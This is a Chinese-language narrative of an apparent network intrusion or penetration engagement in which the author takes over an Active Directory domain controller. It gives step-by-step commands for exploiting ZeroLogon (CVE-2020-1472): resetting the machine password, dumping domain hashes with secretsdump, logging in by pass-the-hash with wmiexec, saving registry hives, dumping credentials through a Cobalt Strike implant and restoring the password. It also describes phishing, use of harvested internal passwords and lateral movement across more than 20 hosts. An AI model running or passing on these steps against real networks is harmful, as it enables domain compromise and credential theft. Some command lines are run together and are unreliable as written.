拿下域控后，我还是对大佬的操作念念不忘( 二 ) _域控

过程中掉了两台主机，又上线了几台疑似沙箱的主机,估计是被发现了，样本拿去检测了。
旗开得胜等到休息的时间，我们就开始正式干活了。上传fscan，探测ip段。
登上去了Windows服务器看了一下，看着这个页面，在做项目迭代升级，并且根据邮箱里的内容，判断这应该是开发经理在使用。
在邮箱里面还找到了一些他们内部的默认密码，这些信息都是可以尝试利用的。

文章插图

然后在右下角看到有IM内部通讯软件，姓名，性别，部门，ip等等信息都有了...这就是拿到了内部通讯录了，这里本想再钓一次鱼，然而大佬说了，可以，但是没必要。

文章插图

现在有两个思路。一是直接打域控漏洞，二是爆破域控密码。显而易见，利用漏洞的方式为上策。所以现在的任务是他们继续去负责横向（此时大佬已经用现有的密码，拿到了20多台Windows+Linux的主机权限，权限够多就不怕掉线了）。

文章插图

我来尝试漏洞利用，那么首先想到的漏洞就是CVE-2020-1472NetLogon特权提升漏洞，该漏洞不要求当前计算机在域内，只要能访问到目标域控并且知道域控主机名和域控ip即可利用。
利用该漏洞重置域控的机器密码，然后使用空密码即可登录域控。不过最主要的是要记得还原密码，不然存储在域中的凭证与本地注册表里的凭证不一致时，会导致目标脱域。
使用poc，对主备域控进行漏洞验证。众望所归，在测试了10多个域控之后，终于测试到有一台域控验证成功了！这是振奋人心的绿色！
Python3poc.py 域控主机名域控ip

文章插图

验证成功后，使用脚本清空域控的机器凭证。
python3poc.py 域控主机名域控ip

文章插图

使用空凭证查看域内账号密码，看到有个krbtgt账号，可以生成票据。
当然这里我们就不用它了，因为第一个是sid为500的账号，那这个就是域控管理员了，后面则是密码hash，可以先尝试解密，如果能直接解出明文密码，就可以直接登录，解不出来的话就先用hash连接。
事实上，账号数量确实太多了。其实往下翻是可以看到已被清空的机器账号主机名$，密码hash已经变成了
31d6cfe0d16ae931b73c59d7e0c089c0（空密码）。
python3poc.py 域名/域控主机名$@域控ip-just-dc -no-pass

文章插图

拿到了域管理员账号和hash，赶紧登录域控，这里使用wmiexec进行连接，下图登录成功，起飞！
python3wmiexec.py -hashes xxx:xxx 域名/管理员用户名@域控ip

文章插图

Powershell上个cs的马，使用如下命令获取dump域控保存在本地注册表的原始主机账号密码。
regsave HKLMSYSTEM system.saveregsave HKLMSAM sam.saveregsave HKLMSECURITY security.save再使用脚本还原主机密码：
python3secretsdump.py -sam sam.save -system system.save -securitysecurity.save LOCAL得到$macHINE的hash：

文章插图

python3reinstall_original_pw.py 域控主机名域控ip$MACHINEhash

文章插图

那么到这一步之后，漏洞利用就完成了。再到cs上hashdump获取密码，拿着密码登录域控，有了域控就可以查看域内所有用户和终端服务器了，接下来的事就是搜集各种信息数据了。大功告成！打完收工！

文章插图

总结【拿下域控后，我还是对大佬的操作念念不忘】最后，梳理一下攻击路径。
首先，利用OA漏洞拿到邮箱账号密码；
然后钓鱼拿到内网域终端；
接着定位域控，使用CVE-2020-1472poc确定存在漏洞的域控；
随后重置域控机器密码，拿到域控命令执行权限，上线cs；
最后还原机器密码，读取域控内存拿到明文密码，登录域控。